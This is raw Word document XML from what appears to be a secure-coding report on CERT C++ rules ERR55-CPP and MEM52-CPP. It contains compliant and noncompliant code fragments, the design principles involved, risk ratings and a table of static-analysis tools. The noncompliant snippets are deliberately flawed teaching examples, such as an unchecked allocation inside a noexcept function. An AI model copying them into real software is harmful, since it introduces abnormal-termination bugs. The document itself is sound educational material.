                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457F1B5B" w14:textId="77777777" w:rsidR="00D75159" w:rsidRPr="00D75159" w:rsidRDefault="00D75159" w:rsidP="00D75159">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>v.resize(s); </w:t>
            </w:r>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// May throw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01CC8C03" w14:textId="2ACCDE9A" w:rsidR="00F72634" w:rsidRPr="00D75159" w:rsidRDefault="00D75159" w:rsidP="00D75159">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D75159">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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721EE80" w:rsidR="00F72634" w:rsidRDefault="00D75159" w:rsidP="0015146B">
            <w:r>
              <w:t>The function’s noexcept() specification is remov</w:t>
            </w:r>
            <w:r w:rsidR="00331AB6">
              <w:t>ed, allowing all exceptions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="2A6DB0E0" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="47120409" w14:textId="77777777" w:rsidR="00331AB6" w:rsidRPr="00331AB6" w:rsidRDefault="00331AB6" w:rsidP="00331AB6">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstddef&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19319A73" w14:textId="77777777" w:rsidR="00331AB6" w:rsidRPr="00331AB6" w:rsidRDefault="00331AB6" w:rsidP="00331AB6">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;vector&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EFEE4B4" w14:textId="77777777" w:rsidR="00331AB6" w:rsidRPr="00331AB6" w:rsidRDefault="00331AB6" w:rsidP="00331AB6">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33988656" w14:textId="77777777" w:rsidR="00331AB6" w:rsidRPr="00331AB6" w:rsidRDefault="00331AB6" w:rsidP="00331AB6">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(std::vector&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt; &amp;v, </w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>size_t</w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>s) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D666CE0" w14:textId="77777777" w:rsidR="00331AB6" w:rsidRPr="00331AB6" w:rsidRDefault="00331AB6" w:rsidP="00331AB6">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>v.resize(s); </w:t>
            </w:r>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// May throw, but that is okay</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D2047C3" w14:textId="6CDBD89B" w:rsidR="00F72634" w:rsidRPr="00331AB6" w:rsidRDefault="00331AB6" w:rsidP="00331AB6">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00331AB6">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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5C3A3F5" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D75BDE0" w14:textId="04EDCC3F" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(9) Use Effective Quality Assurance Techniques- </w:t>
            </w:r>
            <w:r w:rsidR="00D01753">
              <w:t xml:space="preserve">Incorporating good quality assurance techniques such as source code audits can help developers find issues such as the one presented in the noncompliant code where </w:t>
            </w:r>
            <w:r w:rsidR="00710D17">
              <w:t>noexcept(true) was unneeded.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29A926BF" w14:textId="58E6A5D0" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r>
              <w:t>Keep it Simple</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00710D17">
              <w:t xml:space="preserve"> Code that is unnecessary such as the noexcept(true) should not be included. The code is compliant without it, while adding this unnecessarily made it noncompliant.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3A2CD0A" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D7BD83E" w14:textId="3F86FD61" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4323B829" w14:textId="0CB5F6BE" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5CDDA0" w14:textId="003E9CDF" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AF3013" w14:textId="1029D4C1" w:rsidR="00B475A1" w:rsidRDefault="00C07791"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332B493" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Polyspace Bug Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C6600F4" w14:textId="3CC900AC" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303F54C0" w14:textId="2D73DDD9" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CERT C++: ERR55-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08A327DD" w14:textId="7ACFE504" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C07791">
              <w:t>Checks for noexcept functions exiting with exception (rule fully covered)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="50569B33" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D888D34" w14:textId="0F6A94DD" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Axivion Bauhaus Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A9DC142" w14:textId="77259B97" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310BD1C0" w14:textId="6CC78583" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CertC++-ERR55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D7A853F" w14:textId="3D59F531"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37CD7DC5" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Helix QAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28A63EAE" w14:textId="07EC87A2" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CBF64D1" w14:textId="4C2B6063" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>C++4035, C++4036, C++4632</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258B63F8" w14:textId="371D8491"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36AC0CA1" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44AB9F5A" w14:textId="06D1F9BE" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="070D1B90" w14:textId="6EC3D71E" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPP-ERR55-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CE70AF4" w14:textId="408EEAB4" w:rsidR="00B475A1" w:rsidRDefault="00C07791" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C07791">
              <w:t>Where a function's declaration includes an exception-specification, the function shall only be capable of throwing exceptions of the indicated type(s)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AFD6A7C" w:rsidR="00B475A1" w:rsidRPr="00787E48" w:rsidRDefault="00787E48" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Memory Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="519E82BC" w14:textId="52B4E873" w:rsidR="00B475A1" w:rsidRDefault="00312FB6" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>MEM52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="490A5770" w14:textId="7EEE53CA" w:rsidR="00B475A1" w:rsidRDefault="00312FB6" w:rsidP="00F51FA8">
            <w:r w:rsidRPr="00312FB6">
              <w:t>Detect and handle memory allocation errors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6213A30" w:rsidR="00F72634" w:rsidRDefault="00BD756B" w:rsidP="0015146B">
            <w:r>
              <w:t>An array of int is created, but the results of the allocation are not checked. The function is marked as noexcept, but an exception can be thrown by ::operator new[](std::size_t) if the allocation fails; this can lead to abnormal program termination.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="25A0CD90" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60BC9354" w14:textId="77777777" w:rsidR="00BD756B" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstring&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D6CF926" w14:textId="77777777" w:rsidR="00BD756B" w:rsidRPr="00BD756B" w:rsidRDefault="00BD756B" w:rsidP="00BD756B">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD756B">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
